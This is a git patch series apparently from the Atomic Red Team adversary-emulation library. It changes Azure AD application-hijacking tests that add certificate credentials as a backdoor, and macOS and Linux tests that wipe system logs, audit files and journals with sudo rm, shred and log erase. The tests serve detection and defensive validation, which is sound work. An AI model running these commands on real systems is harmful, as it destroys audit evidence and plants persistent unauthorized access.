New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37593,8 +37582,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -37618,14 +37606,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -37649,21 +37629,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId 
$app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37676,8 +37653,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false T1053.004: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d7b4d4e8..b8224d2f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -62806,14 +62806,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -62837,21 +62829,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62864,8 +62853,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -62889,14 +62877,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -62920,21 +62900,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId 
$app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62947,8 +62924,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index b1150539..1eb42e11 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md @@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | service_principal_name | Name of the targeted service principal | string | SuperSP| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! 
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb 
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -94,7 +89,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore ``` @@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | application_name | Name of the targeted application | string | SuperApp| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! 
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +$auth = 
Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -188,7 +177,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore ``` From d8c164d3e6b3bcf24feb622feccc8edcfba538b8 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Sat, 10 Jun 2023 05:19:16 +0000 Subject: [PATCH 10/10] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 239 ++++++++++++++++++++++++++++--- atomics/Indexes/linux-index.yaml | 62 +++++++- atomics/Indexes/macos-index.yaml | 204 +++++++++++++++++++++++--- atomics/T1070.002/T1070.002.md | 235 +++++++++++++++++++++++++++--- 4 files changed, 682 insertions(+), 58 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b8224d2f..c1ff28fe 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -4580,10 +4580,33 @@ defense-evasion:
 supported_platforms:
 - macos
 - linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
 executor:
 command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
 name: sh
 elevation_required: true
 - name: Delete log files using built-in log utility
@@ -4598,7 +4621,6 @@ defense-evasion:
 command: |
 sudo log erase --all
 sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
 name: sh
 elevation_required: true
 - name: Truncate system log files via truncate utility
@@ -4610,9 +4632,25 @@ defense-evasion:
 '
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
 executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
+ truncate --size=0 #{system_log_path} #size parameter \n"
 name: sh
 elevation_required: true
 - name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -4624,10 +4662,26 @@ defense-evasion:
 '
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
 executor:
 command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
 name: sh
 elevation_required: true
 - name: System log file deletion via find utility
@@ -4638,11 +4692,37 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_name1: + description: name or prefix of system log to delete. + type: string + default: system.log + system_log_name2: + description: name or prefix of system log to delete. + type: string + default: system.log.97.gz + system_log_name3: + description: name or prefix of system log to delete. + type: string + default: system.log.98.gz + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' + get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} + /var/log/#{system_log_name3} + + ' executor: command: | - sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution - sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution - sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution + sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution + sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution + sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility @@ -4653,8 +4733,13 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" executor: - command: 'sudo echo '''' > /var/log/system.log + command: 'sudo echo '''' > #{system_log_path} ' name: sh 
@@ -4680,8 +4765,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo unlink /var/log/system.log + command: 'sudo unlink #{system_log_path} ' name: sh @@ -4694,8 +4795,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'sudo shred -u -z -n 3 /var/log/system.log + command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh 
@@ -4708,10 +4825,31 @@ defense-evasion: Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + system_log_folder: + description: path to log parent folder + type: string + default: "/var/log/" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} #{system_log_folder} + + ' + get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} + #{system_log_folder}/system.log + + ' executor: command: | - sudo srm /var/log/system.log #system log file deletion - sudo srm -r /var/log/ #recursive deletion of log files + sudo srm #{system_log_path} #system log file deletion + sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript @@ -4723,8 +4861,24 @@ defense-evasion: ' supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator + command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' 
@@ -4738,8 +4892,24 @@ defense-evasion: Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos + input_arguments: + system_log_path: + description: path to system.log + type: string + default: "/var/log/system.log" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{system_log_path} + + ' + get_prereq_command: 'touch #{system_log_path} + + ' executor: - command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"'' + command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh @@ -4753,9 +4923,25 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + journal_folder: + description: path to journal logs + type: string + default: "/var/log/journal" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{journal_folder} + + ' + get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal + + ' executor: command: | - sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content + sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place name: sh elevation_required: true @@ -4773,7 +4959,19 @@ defense-evasion: description: Username of mail spool type: string default: root + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/spool/mail/#{username} + + ' + get_prereq_command: 'touch /var/spool/mail/#{username} + + ' executor: + elevation_required: true command: 'echo 0> /var/spool/mail/#{username} ' 
@@ -4796,6 +4994,11 @@ defense-evasion: ' name: bash + elevation_required: true + cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} + ; fi + + ' T1218.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index d2498783..a9103054 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -3310,10 +3310,33 @@ defense-evasion: supported_platforms: - macos - linux + input_arguments: + syslog_path: + description: path of syslog file to delete. On macos it's /var/log/system.log*, + on linux, it's /var/log/syslog*. Also note for File events, that on macos, + /var/ is a link to /private/var/. + type: string + default: "/var/log/system.log" + macos_audit_path: + description: path of audit file to delete + type: string + default: "/var/audit/20220725213300.202208110700021" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi + && stat #{syslog_path} + + ' + get_prereq_command: | + touch #{syslog_path} + if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | - sudo rm -rf /private/var/log/system.log* - sudo rm -rf /private/var/audit/* + sudo rm -rf #{syslog_path} + if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete system journal logs via rm and journalctl utilities 
@@ -3325,9 +3348,25 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + journal_folder: + description: path to journal logs + type: string + default: "/var/log/journal" + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat #{journal_folder} + + ' + get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal + + ' executor: command: | - sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content + sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place name: sh elevation_required: true @@ -3345,7 +3384,19 @@ defense-evasion: description: Username of mail spool type: string default: root + dependency_executor_name: sh + dependencies: + - description: 'target files must exist + + ' + prereq_command: 'stat /var/spool/mail/#{username} + + ' + get_prereq_command: 'touch /var/spool/mail/#{username} + + ' executor: + elevation_required: true command: 'echo 0> /var/spool/mail/#{username} ' @@ -3368,6 +3419,11 @@ defense-evasion: ' name: bash + elevation_required: true + cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} + ; fi + + ' T1218.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index fa9e9661..2c80a7c9 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml 
@@ -3041,10 +3041,33 @@ defense-evasion:
 supported_platforms:
 - macos
 - linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
 executor:
 command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
 name: sh
 elevation_required: true
 - name: Delete log files using built-in log utility
@@ -3059,7 +3082,6 @@ defense-evasion:
 command: |
 sudo log erase --all
 sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
 name: sh
 elevation_required: true
 - name: Truncate system log files via truncate utility
@@ -3071,9 +3093,25 @@ defense-evasion:
 '
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
 executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
